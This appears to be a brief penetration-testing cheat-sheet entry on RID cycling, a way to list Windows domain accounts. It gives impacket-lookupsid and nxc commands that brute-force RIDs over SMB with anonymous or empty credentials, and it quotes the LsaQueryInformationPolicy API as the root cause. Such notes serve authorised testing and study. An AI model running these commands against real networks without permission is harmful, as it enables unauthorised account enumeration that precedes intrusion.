RID Cycling
Abuse
# impacket
impacket-lookupsid anonymous@<target-ip> -no-pass 10000
# nxc
nxc smb <target-ip> -u '' -p '' --rid-brute 10000Root Couse
NTSTATUS LsaQueryInformationPolicy(
[in] LSA_HANDLE PolicyHandle,
[in] POLICY_INFORMATION_CLASS InformationClass,
[out] PVOID *Buffer
);



References
Last updated